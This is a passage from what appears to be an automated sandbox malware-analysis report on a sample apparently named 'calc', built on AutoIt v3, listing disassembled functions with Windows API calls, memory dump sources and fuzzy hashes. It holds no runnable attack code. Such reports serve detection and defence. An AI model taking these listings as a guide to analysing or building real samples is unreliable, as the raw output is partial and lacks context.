    • Instruction Fuzzy Hash: 27913BB1A08208FBDF209A00CC86FEA7634EB04748F659057B546731A1E7BD6E919A5F
    Function 0040590B Relevance: 42.2, APIs: 28, Instructions: 172windowCOMMON
    Download Yara Rule
    APIs
    • GetSysColor.USER32(0000000E), ref: 0040592E
    • SetTextColor.GDI32(?,00000000), ref: 00405936
    • GetSysColor.USER32(00000012), ref: 00405950
    • SetTextColor.GDI32(?,00405B21), ref: 00405958
    • GetSysColorBrush.USER32(0000000F), ref: 0040596C
    • GetSysColor.USER32(0000000F), ref: 00405978
    • CreateSolidBrush.GDI32(?), ref: 00405983
    • GetSysColor.USER32(00000011), ref: 00405999
    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 004059AB
    • SelectObject.GDI32(?,00000000), ref: 004059BD
    • SetBkColor.GDI32(?,?), ref: 004059C5
    • SelectObject.GDI32(?,?), ref: 004059D4
    • InflateRect.USER32(?,000000FF,000000FF), ref: 004059F2
    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00405A0D
    • 73A245F0.USER32(?,000000F0), ref: 00405A23
    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00405A3E
    • GetWindowTextW.USER32(?,00000000,00000001), ref: 00405A59
    • InflateRect.USER32(?,000000FD,000000FD), ref: 00405A7B
    • DrawFocusRect.USER32(?,?), ref: 00405A87
    • GetSysColor.USER32(00000011), ref: 00405A96
    • SetTextColor.GDI32(?,00000000), ref: 00405A9E
    • DrawTextW.USER32(?,?,000000FF,?,?), ref: 00405AB4
    • SelectObject.GDI32(?,?), ref: 00405AC9
    • DeleteObject.GDI32(?), ref: 00405AD5
    • SelectObject.GDI32(?,?), ref: 00405ADC
    • DeleteObject.GDI32(?), ref: 00405AE2
    • SetTextColor.GDI32(?,?), ref: 00405AE9
    • SetBkColor.GDI32(?,?), ref: 00405AF4
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflate$A245FocusMessageRoundSendSolidWindow
    • String ID:
    • API String ID: 1733439248-0
    • Opcode ID: f1a16920f4ad76e814914eb5285a5df8bf8ad5b739744b2433b8963779283dd9
    • Instruction ID: 6c58bee66d785cfda33b29ccf49808c69a7ed797e4659f5d7d1f827d9b486f44
    • Opcode Fuzzy Hash: f1a16920f4ad76e814914eb5285a5df8bf8ad5b739744b2433b8963779283dd9
    • Instruction Fuzzy Hash: B7516E72408705FFD7019F60DC48A5BBBA9FB89322F100929F662921E1D776DD50CF59
    Function 0040A09F Relevance: 36.4, APIs: 24, Instructions: 439windowCOMMON
    Download Yara Rule
    APIs
    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0040A134
    • 73A245F0.USER32(?,000000F0,?,?,?), ref: 0040A18B
    • SendMessageW.USER32(?,0000113F,00000000,?), ref: 0040A1D9
    • SendMessageW.USER32(?,00001102,00000002,?), ref: 0040A1EE
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: MessageSend$A245Window
    • String ID:
    • API String ID: 349537488-0
    • Opcode ID: 30ae90ada34b8915fe5d48397d56539aa5b534ff0d9fec3e80aeb03df8ee1511
    • Instruction ID: 1ccb3f83f87ebe80ca020bc58a8cdf7a85d923699afa6deb09b0e52051601b14
    • Opcode Fuzzy Hash: 30ae90ada34b8915fe5d48397d56539aa5b534ff0d9fec3e80aeb03df8ee1511
    • Instruction Fuzzy Hash: 4A028171504348ABEF21CF24CD85BE93BE0AF09354F28416AFD61AA2E2D378DC55DB49
    Function 0042CC1E Relevance: 36.1, APIs: 24, Instructions: 118threadCOMMON
    Download Yara Rule
    APIs
    • LoadCursorW.USER32(00000000,00007F8A), ref: 0042CC35
    • LoadCursorW.USER32(00000000,00007F00), ref: 0042CC40
    • LoadCursorW.USER32(00000000,00007F03), ref: 0042CC4B
    • LoadCursorW.USER32(00000000,00007F8B), ref: 0042CC56
    • LoadCursorW.USER32(00000000,00007F01), ref: 0042CC61
    • LoadCursorW.USER32(00000000,00007F81), ref: 0042CC6C
    • LoadCursorW.USER32(00000000,00007F88), ref: 0042CC77
    • LoadCursorW.USER32(00000000,00007F80), ref: 0042CC82
    • LoadCursorW.USER32(00000000,00007F86), ref: 0042CC8D
    • LoadCursorW.USER32(00000000,00007F83), ref: 0042CC98
    • LoadCursorW.USER32(00000000,00007F85), ref: 0042CCA3
    • LoadCursorW.USER32(00000000,00007F82), ref: 0042CCAE
    • LoadCursorW.USER32(00000000,00007F84), ref: 0042CCB9
    • LoadCursorW.USER32(00000000,00007F04), ref: 0042CCC4
    • LoadCursorW.USER32(00000000,00007F02), ref: 0042CCCF
    • GetCursorPos.USER32(?), ref: 0042CCD8
    • WindowFromPoint.USER32(?,?), ref: 0042CCE4
    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0042CCF7
    • GetCurrentThreadId.KERNEL32 ref: 0042CD00
    • AttachThreadInput.USER32(00000000), ref: 0042CD03
    • GetCursor.USER32 ref: 0042CD09
    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0042CD17
    • GetCurrentThreadId.KERNEL32 ref: 0042CD1A
    • AttachThreadInput.USER32(00000000), ref: 0042CD1D
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Cursor$Load$Thread$Window$AttachCurrentInputProcess$FromPoint
    • String ID:
    • API String ID: 25922675-0
    • Opcode ID: b3dee8c5c33cc5a5e27d9d6878bb93dc215f6f67bec1131d5dbaf3b8734b53b9
    • Instruction ID: b9d9b1f01e5e50cc857d8ed62ab4f6a13f19b37c746215968ab34a60c96efe33
    • Opcode Fuzzy Hash: b3dee8c5c33cc5a5e27d9d6878bb93dc215f6f67bec1131d5dbaf3b8734b53b9
    • Instruction Fuzzy Hash: 3831FE71D44319BADF119BB69C89CAFBEBCEF45B50B10042BB108E7191DAB89801CE65
    Function 0040667C Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 279windowtimeCOMMON
    Download Yara Rule
    APIs
    • GetWindowRect.USER32(?,?), ref: 00406756
    • GetClientRect.USER32(?,?), ref: 00406763
    • GetSystemMetrics.USER32(00000007), ref: 0040676B
    • GetSystemMetrics.USER32(00000008), ref: 00406775
    • GetSystemMetrics.USER32(00000004), ref: 0040677C
    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004067B7
    • GetSystemMetrics.USER32(00000007), ref: 004067BF
    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004067E4
    • GetSystemMetrics.USER32(00000008), ref: 004067EC
    • GetSystemMetrics.USER32(00000004), ref: 0040680B
    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00406822
    • AdjustWindowRectEx.USER32(000000FF,000000FF,00000000,000000FF), ref: 00406833
    • CreateWindowExW.USER32(000000FF,AutoIt v3 GUI,?,000000FF,000000FF,000000FF,000000FF,000000FF,?,00000000,?,00000000), ref: 00406866
    • GetSysColorBrush.USER32(0000000F), ref: 00406889
    • SetClassLongW.USER32(00000000,000000F6,00000000), ref: 00406894
    • GetStockObject.GDI32(00000011), ref: 0040689D
    • SendMessageW.USER32(00000000,00000030,00000000), ref: 004068A8
      • Part of subcall function 00405E8E: GetCursorPos.USER32(?), ref: 00405E9B
      • Part of subcall function 00405E8E: ScreenToClient.USER32(?,?), ref: 00405EB8
      • Part of subcall function 00405E8E: GetAsyncKeyState.USER32(00000001), ref: 00405EFB
      • Part of subcall function 00405E8E: GetKeyState.USER32(00000001), ref: 00405F09
      • Part of subcall function 00405E8E: GetAsyncKeyState.USER32(00000002), ref: 00405F23
      • Part of subcall function 00405E8E: GetKeyState.USER32(00000002), ref: 00405F2C
    • SetTimer.USER32(00000000,00000002,00000028,0040D302), ref: 004069AE
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: System$Metrics$RectState$Window$AsyncClientInfoParameters$AdjustBrushClassColorCreateCursorLongMessageObjectScreenSendStockTimer
    • String ID: @$AutoIt v3 GUI
    • API String ID: 1855594723-3359773793
    • Opcode ID: 746de3ba9a565f6f7184f334b2ddbe938bcb32804301b9d8145e54d6b0455321
    • Instruction ID: 514e7c4c687a5ce374bb04586ee4052b998ddc7ec21dd9060e496e987db54609
    • Opcode Fuzzy Hash: 746de3ba9a565f6f7184f334b2ddbe938bcb32804301b9d8145e54d6b0455321
    • Instruction Fuzzy Hash: 09C149B1900249DFDF11CF69C884ADA7FB4AF59314F05027AEE19AB296D7748890CF68
    Function 00441086 Relevance: 33.6, APIs: 18, Strings: 1, Instructions: 348windowCOMMON
    Download Yara Rule
    APIs
    • GetCursorPos.USER32(?), ref: 004411F0
    • GetDesktopWindow.USER32 ref: 00441202
    • GetWindowRect.USER32(00000000), ref: 00441209
    • 73A245F0.USER32(?,000000F0), ref: 00441291
    • 73A25CF0.USER32(?), ref: 004412AD
    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 004412E5
    • SendMessageW.USER32(00000000,00000432,00000000), ref: 00441302
    • SendMessageW.USER32(?,00000439,00000000), ref: 00441326
    • SendMessageW.USER32(?,00000421,?,?), ref: 00441339
    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0044134C
    • IsWindowVisible.USER32(?), ref: 00441354
    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 0044136F
    • SendMessageW.USER32(?,00000411,00000001,00000000), ref: 00441382
    • GetWindowRect.USER32(?,?), ref: 00441398
    • CopyRect.USER32(?,?), ref: 0044140C
    • FreeLibrary.KERNEL32(?), ref: 0044144C
    • FreeLibrary.KERNEL32(?), ref: 00441457
    • SendMessageW.USER32(?,00000412,00000000,?), ref: 00441478
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: MessageSend$Window$Rect$FreeLibrary$A245CopyCreateCursorDesktopVisible
    • String ID: tooltips_class32
    • API String ID: 142203186-1918224756
    • Opcode ID: 43c6dc1a8b3db3df7b7c2940e1ab202c272af0dccaaacba1c09e653d6df8d75a
    • Instruction ID: 08c47ab1ab3467a4e06423d45bef535535d0a513bd421b0415e228815a64da0f
    • Opcode Fuzzy Hash: 43c6dc1a8b3db3df7b7c2940e1ab202c272af0dccaaacba1c09e653d6df8d75a
    • Instruction Fuzzy Hash: ACD17870600248EFEF14DF69C988A9A7BA4FF09350F14816AF919D7661D778ECC4CB98
    Function 00408DC0 Relevance: 33.4, APIs: 22, Instructions: 435windowCOMMON
    Download Yara Rule
    APIs
    • SendMessageW.USER32(?,00001308,?,00000000), ref: 00408E5F
    • 6F550200.COMCTL32(?,?,?,?,?), ref: 00408E8F
    • DeleteObject.GDI32(?), ref: 004092CE
    • DeleteObject.GDI32(?), ref: 004092D8
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: DeleteObject$F550200MessageSend
    • String ID:
    • API String ID: 3481299903-0
    • Opcode ID: 681bfac6f9b775f46c0de513788c86c80d53ef1ddb92152cbeed067875cecc96
    • Instruction ID: 7d2debd5b4728ea3e7bc78dbc7d3a0c9875d6f4225f609ec850b9899efb3e1eb
    • Opcode Fuzzy Hash: 681bfac6f9b775f46c0de513788c86c80d53ef1ddb92152cbeed067875cecc96
    • Instruction Fuzzy Hash: 4CF1BE30600606EFDB21DF64C984AAAB7F5BF05300F1406AEE555EB2E2C738ED90CB59
    Function 0040B005 Relevance: 30.0, APIs: 12, Strings: 5, Instructions: 205windowlibraryCOMMON
    Download Yara Rule
    APIs
    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0040B0B5
    • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,?,00407B65,?,?,?), ref: 0040B0C7
    • LoadImageW.USER32(?,00000000,00000001,?,?,00000000), ref: 0040B0FD
    • LoadImageW.USER32(?,e{@,00000001,?,?,00000000), ref: 0040B11B
    • LoadImageW.USER32(00000000,e{@,00000001,?,?,00000000), ref: 0040B137
    • LoadImageW.USER32(?,00000000,00000001,?,?,00000000), ref: 0040B15E
    • FreeLibrary.KERNEL32(?), ref: 0040B16D
    • ExtractIconExW.SHELL32(?,e{@,00000000,?,00000001), ref: 0040B1B2
    • DestroyCursor.USER32(?), ref: 0040B1C0
    • SendMessageW.USER32(?,00000170,?,00000000), ref: 0040B1DF
    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0040B1ED
    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,00407B65,?,?,?), ref: 0040B208
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIconMoveWindow
    • String ID: .dll$.exe$.icl$e{@$e{@
    • API String ID: 1851087544-962543721
    • Opcode ID: af8eac04663e9df3f95dba2228b4814750b1f193dca40aa3f66548974c5dcc0c
    • Instruction ID: d209de9e82884b2b1933e4d2be4e6672a96570fc34edf142eca6f664b014f0a1
    • Opcode Fuzzy Hash: af8eac04663e9df3f95dba2228b4814750b1f193dca40aa3f66548974c5dcc0c
    • Instruction Fuzzy Hash: 2C618D72840219BEDB119FA4DC819BF7BBCEF08741F10806BF911E6181D7799E95CB98
    Function 0043BC56 Relevance: 26.7, APIs: 10, Strings: 5, Instructions: 448registryCOMMON
    Download Yara Rule
    APIs
    • RegConnectRegistryW.ADVAPI32(?,00000000,00000000), ref: 0043BD0B
    • RegCreateKeyExW.ADVAPI32(00000000,?,00000000,0045C6D0,00000000,?,00000000,?,?), ref: 0043BD4D
    • RegCloseKey.ADVAPI32(?), ref: 0043BD8C
    • RegCloseKey.ADVAPI32(0000000B), ref: 0043C0EA
    • RegCloseKey.ADVAPI32(?,00000000), ref: 0043C0FB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Close$ConnectCreateRegistry
    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_SZ
    • API String ID: 3641090821-2346799943
    • Opcode ID: 75ae5717d4df2877ac3cf736d960aa62e2c2189aa5ebfeae25e3cd7cf454876b
    • Instruction ID: 4e5dcfff71b9e01845b74f9f44c6162979518723417988faa36490e585955599
    • Opcode Fuzzy Hash: 75ae5717d4df2877ac3cf736d960aa62e2c2189aa5ebfeae25e3cd7cf454876b
    • Instruction Fuzzy Hash: 68F18035900114DBDF14EF55DC82A9AB374EF08324F29909BEA05AF252DB38ED81DBD9
    Function 0040370F Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 297COMMON
    Download Yara Rule
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID:
    • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPTITLE$TITLE
    • API String ID: 0-1002644998
    • Opcode ID: 3c7fa305eab5f4f599ecf5b929de329c0e157a2d8d384dd79bfd7de8c26ace83
    • Instruction ID: f31cf381076a0f888e4b9b29ebd17d05e6bef760160a7657eb3a5a9d70ff2295
    • Opcode Fuzzy Hash: 3c7fa305eab5f4f599ecf5b929de329c0e157a2d8d384dd79bfd7de8c26ace83
    • Instruction Fuzzy Hash: 0FC17E71A042559EDF11EF65C8847AA7FA8AF08309F0541ABFC04BB287C77CD949CB69
    Function 004530C8 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 117fileCOMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 0045314B
    • _strcat.LIBCMT ref: 0045315E
    • _strlen.LIBCMT ref: 0045316B
    • _strlen.LIBCMT ref: 0045317A
    • _strncpy.LIBCMT ref: 00453191
    • _strlen.LIBCMT ref: 0045319A
    • _strlen.LIBCMT ref: 004531A7
    • _strcat.LIBCMT ref: 004531C5
    • _strlen.LIBCMT ref: 0045320A
    • GetStdHandle.KERNEL32(000000F4,0045BF80,00000000,?,00000000,00000000,00000000,00000000), ref: 00453215
    • WriteFile.KERNEL32(00000000), ref: 0045321C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: _strlen$File_strcat$HandleModuleNameWrite_strncpy
    • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
    • API String ID: 3601721357-4022980321
    • Opcode ID: 75cfc9f95704c09ffc73363e3e13a98c4ff16b715d51b3c665fe841355ba8e17
    • Instruction ID: a6262fdefab13baafbc7e32f5453cb19c54bbfc7fce803c14b00e12ad1906f00
    • Opcode Fuzzy Hash: 75cfc9f95704c09ffc73363e3e13a98c4ff16b715d51b3c665fe841355ba8e17
    • Instruction Fuzzy Hash: CC310E72500604AAE724EF759C96EAF7368EB04346F20491FF811D3143DA79E948DB5D
    Function 0040E543 Relevance: 25.7, APIs: 17, Instructions: 176windowtimeCOMMON
    Download Yara Rule
    APIs
    • LoadIconW.USER32(000000A1), ref: 0040E556
    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0040E568
    • SetWindowTextW.USER32(?,?), ref: 0040E579
    • GetDlgItem.USER32(?,000003EA), ref: 0040E592
    • SetWindowTextW.USER32(00000000,?), ref: 0040E598
    • GetDlgItem.USER32(?,000003E9), ref: 0040E5AD
    • SetWindowTextW.USER32(00000000,?), ref: 0040E5B3
    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0040E5D7
    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 0040E5EC
    • GetWindowRect.USER32(?,?), ref: 0040E5F5
    • SetWindowTextW.USER32(?,?), ref: 0040E673
    • GetDesktopWindow.USER32 ref: 0040E67D
    • GetWindowRect.USER32(00000000), ref: 0040E684
    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0040E6D0
    • GetClientRect.USER32(?,?), ref: 0040E6DD
    • PostMessageW.USER32(?,00000005,00000000,?), ref: 0040E702
    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0040E733
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
    • String ID:
    • API String ID: 3869813825-0
    • Opcode ID: d4820c36cfa737b428ee0223e954d4ce18d5dde5e2b1fea486171c5a7800d9a8
    • Instruction ID: 311043bbe2a0cac2703a3cba35c520e36c28c6709c8c22dbd14506481d928203
    • Opcode Fuzzy Hash: d4820c36cfa737b428ee0223e954d4ce18d5dde5e2b1fea486171c5a7800d9a8
    • Instruction Fuzzy Hash: 18614C71A0061AFFDB019FAADD44AAEBBB9FF08305F004525E500B26A1D735ED65CF98
    Function 004404F4 Relevance: 24.9, APIs: 1, Strings: 13, Instructions: 400COMMON
    Download Yara Rule
    APIs
    • CharUpperBuffW.USER32(?,00000003), ref: 00440567
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: BuffCharUpper
    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
    • API String ID: 3964851224-719923060
    • Opcode ID: 41d0307e089b8847080efe93841ebbe1fd225430cfa306154dc080f75187ca39
    • Instruction ID: 91dec06f46bf67a56ffbca69d406a93361d98d2bcf5d6cb5d48021af8806dc55
    • Opcode Fuzzy Hash: 41d0307e089b8847080efe93841ebbe1fd225430cfa306154dc080f75187ca39
    • Instruction Fuzzy Hash: 77F1A135904204ABEF10EF51C881ADD77B0AF04324F15809BE9157B297CB7CEE95DB99
    Function 00412E32 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 208windowCOMMON
    Download Yara Rule
    APIs
    • GetMenuItemInfoW.USER32(00000007,?,00000000,0000002C), ref: 00412EEC
    • GetMenuItemCount.USER32(0047A6A8), ref: 00412F7B
    • DeleteMenu.USER32(0047A6A8,00000005,00000000,0047A6A8,?,00000000), ref: 00413012
